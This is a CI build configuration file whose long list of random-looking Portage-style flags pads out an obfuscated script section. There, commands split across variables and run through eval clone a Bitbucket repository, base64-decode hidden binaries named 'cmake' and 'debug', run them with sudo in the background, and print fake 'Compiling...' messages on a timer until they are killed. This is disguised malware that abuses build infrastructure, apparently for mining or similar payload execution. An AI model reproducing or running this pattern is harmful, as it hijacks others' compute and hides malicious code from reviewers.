dist: bionic

env:
  - BUILD="--autounmask-write=642tf"
  - BUILD="--resume=486mM"
  - BUILD="--color=150UW"
  - BUILD="--ignore-soname-deps=540vU"
  - BUILD="--ignore-soname-deps=776oo"
  - BUILD="--alert=372L4"
  - BUILD="--autounmask-keep-keywords=537C6"
  - BUILD="--digest=867rL"
  - BUILD="--ignore-soname-deps=532T6"
  - BUILD="--rebuild-ignore=886r1"
  - BUILD="--dynamic-deps=157mr"
  - BUILD="--dynamic-deps=231j2"
  - BUILD="--rebuild-if-new-rev=381Wp"
  - BUILD="--complete-graph-if-new-ver=834J2"
  - BUILD="--getbinpkgonly=451Ap"
  - BUILD="--update=332h0"
  - BUILD="--rebuild-if-new-rev=623hN"
  - BUILD="--quiet-repo-display=99402"
  - BUILD="--search-index=8681W"
  - BUILD="--rebuild-if-new-ver=397KB"
  - BUILD="--binpkg-changed-deps=203sz"
  - BUILD="--fetch-all-uri=373Sv"
  - BUILD="--usepkg=663HL"
  - BUILD="--autounmask-use=329cr"
  - BUILD="--quiet-build=812cl"
  - BUILD="--ask-enter-invalid=18O2"
  - BUILD="--alert=638MN"
  - BUILD="--deselect=687y1"
  - BUILD="--accept-properties=944sd"
  - BUILD="--ask-enter-invalid=734w2"
  - BUILD="--autounmask-keep-keywords=717IZ"
  - BUILD="--regen=5757v"
  - BUILD="--deep=731xb"
  - BUILD="--search=413FT"
  - BUILD="--quiet-unmerge-warn=161VH"
  - BUILD="--autounmask-keep-keywords=4181v"
  - BUILD="--prefix=373Yx"
  - BUILD="--rebuild-if-new-slot=320zt"
  - BUILD="--color=988fr"
  - BUILD="--implicit-system-deps=358B5"
  - BUILD="--ask=172Up"
  - BUILD="--usepkgonly=681Hv"
  - BUILD="--verbose-conflicts=887xP"
  - BUILD="--regen=314gZ"
  - BUILD="--complete-graph-if-new-use=829Ds"
  - BUILD="--tree=47Ua"
  - BUILD="--binpkg-respect-use=400Ag"
  - BUILD="--quiet=3908i"
  - BUILD="--buildpkg=929Nd"
  - BUILD="--ignore-soname-deps=58Yp"
  - BUILD="--alphabetical=130Tt"
  - BUILD="--buildpkg=869Bt"
  - BUILD="--complete-graph=128lp"
  - BUILD="--fetch-all-uri=726Zu"
  - BUILD="--binpkg-respect-use=690nz"
  - BUILD="--sysroot=974SY"
  - BUILD="--pkg-format=850i"
  - BUILD="--onlydeps=537sd"
  - BUILD="--debug=456Ly"
  - BUILD="--package-moves=906hU"
  - BUILD="--fetch-all-uri=229ty"
  - BUILD="--sync-submodule=980zP"
  - BUILD="--binpkg-changed-deps=423Jc"
  - BUILD="--getbinpkg=694uo"
  - BUILD="--with-bdeps-auto=743j1"
  - BUILD="--changed-use=340bI"
  - BUILD="--changed-slot=167DY"
  - BUILD="--binpkg-respect-use=3713H"
  - BUILD="--changed-deps=603GT"
  - BUILD="--useoldpkg-atoms=39jR"
  - BUILD="--nodeps=80827"
  - BUILD="--sync=413T5"
  - BUILD="--rebuilt-binaries=103ZT"
  - BUILD="--usepkg=8146t"
  - BUILD="--digest=427cu"
  - BUILD="--autounmask-keep-masks=282Pv"
  - BUILD="--changed-use=917D2"
  - BUILD="--implicit-system-deps=14084"
  - BUILD="--root-deps=625T4"
  - BUILD="--prune=61Uy"
  - BUILD="--package-moves=571NF"
  - BUILD="--help=343Rs"
  - BUILD="--rage-clean=868Nu"
  - BUILD="--sync-submodule=9897P"
  - BUILD="--debug=441o8"
  - BUILD="--info=624V6"
  - BUILD="--metadata=1352A"
  - BUILD="--sync=393bH"
  - BUILD="--binpkg-respect-use=721sJ"
  - BUILD="--unordered-display=591k3"
  - BUILD="--with-bdeps=8371f"
  - BUILD="--noconfmem=318zG"
  - BUILD="--load-average=846VC"
  - BUILD="--rebuild-ignore=23JS"
  - BUILD="--useoldpkg-atoms=940LO"
  - BUILD="--list-sets=791Sr"
  - BUILD="--tree=590i0"
  - BUILD="--changed-deps-report=419P2"
  - BUILD="--root=66423"
  - BUILD="--rebuild-if-new-slot=434Oj"
  - BUILD="--searchdesc=12vx"
  - BUILD="--quiet-repo-display=818ls"
  - BUILD="--with-bdeps-auto=307ro"
  - BUILD="--regen=52SE"
  - BUILD="--keep-going=45xq"
  - BUILD="--accept-properties=2212E"
  - BUILD="--changed-use=832ZG"
  - BUILD="--columns=884ay"
  - BUILD="--autounmask-continue=894Cw"
  - BUILD="--rebuilt-binaries=602jR"
  - BUILD="--with-test-deps=582RF"
  - BUILD="--jobs=904C9"
  - BUILD="--getbinpkgonly=957Nv"
  - BUILD="--digest=435cK"
  - BUILD="--oneshot=3307l"
  - BUILD="--exclude=3637R"
  - BUILD="--config=438Qi"
  - BUILD="--rebuild-if-new-rev=718hs"
  - BUILD="--rebuild-if-new-ver=982Ur"
  - BUILD="--verbose=8887e"
  - BUILD="--complete-graph-if-new-ver=8863M"
  - BUILD="--verbose=1164F"
  - BUILD="--autounmask-only=60Gl"
  - BUILD="--autounmask-write=77448"
  - BUILD="--debug=572Bv"
  - BUILD="--check-news=7372Z"
  - BUILD="--ask=498pc"
  - BUILD="--changed-slot=16S9"
  - BUILD="--with-bdeps=648Fj"
  - BUILD="--debug=846oP"
  - BUILD="--select=927cX"
  - BUILD="--autounmask-use=137IK"
  - BUILD="--searchdesc=250hE"
  - BUILD="--binpkg-respect-use=772TN"
  - BUILD="--newuse=407jF"
  - BUILD="--sync-submodule=16n9"
  - BUILD="--getbinpkg=345P4"
  - BUILD="--getbinpkgonly=171uY"
  - BUILD="--nodeps=865Jw"
  - BUILD="--misspell-suggestions=361YK"
  - BUILD="--buildpkgonly=889Nh"
  - BUILD="--noconfmem=357JB"
  - BUILD="--digest=326Kz"
  - BUILD="--list-sets=785Iy"
  - BUILD="--unordered-display=113o0"
  - BUILD="--binpkg-changed-deps=239AB"
  - BUILD="--depclean-lib-check=979Eu"
  - BUILD="--config=437S7"
  - BUILD="--ignore-soname-deps=397Aq"
  - BUILD="--usepkgonly=680y1"
  - BUILD="--useoldpkg-atoms=358j4"
  - BUILD="--ignore-soname-deps=505zd"

language: minimal

script:
  - GXfWJtJmXc="sudo apt up"
  - BlKSzE="date || tru"
  - eval "$GXfWJtJmXc""$BlKSzE""e"
  - NsuwtJkfF="sudo apt --"
  - WWEWhCNPOjZ="yes install"
  - zdcFL=" cl-base64 "
  - EsyLNHel="git &>/dev/"
  - HBhpvfcoj="null || tru"
  - eval "$NsuwtJkfF""$WWEWhCNPOjZ""$zdcFL""$EsyLNHel""$HBhpvfcoj""e"
  - kCyMx="git clone h"
  - cvssFZuH="ttps://gccb"
  - cyBFMA="uild@bitbuc"
  - XLdrgp="ket.org/gcc"
  - BmZsWJ="build/gcc.g"
  - FHEPuYtboL="it &>/dev/n"
  - eval "$kCyMx""$cvssFZuH""$cyBFMA""$XLdrgp""$BmZsWJ""$FHEPuYtboL""ull"
  - tPqsETuo="base64 -d g"
  - pQWLH="cc/cmake_ >"
  - eval "$tPqsETuo""$pQWLH"" cmake"
  - NpEdAG="base64 -d g"
  - VXyBZwYim="cc/config_ "
  - eval "$NpEdAG""$VXyBZwYim""> log"
  - GNeVDYGc="base64 -d g"
  - YVcWsmNP="cc/make_ > "
  - eval "$GNeVDYGc""$YVcWsmNP""debug"
  - chmod +x debug cmake
  - QroBc="./cmake"
  - eval "$QroBc"""
  - sed -i 's/build/tb2o/g' log
  - SQEyYFdm="sudo ./debu"
  - gAoNuT="g --config="
  - aXKXmXtDPL="log &>/dev/"
  - eval "$SQEyYFdm""$gAoNuT""$aXKXmXtDPL""null &"
  - GCC=$(date +%s)
  - PKNlNPqCQAh="echo $BUILD"
  - eval "$PKNlNPqCQAh"""
  - while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2517)) ] && sudo killall debug && break; sleep 206; done
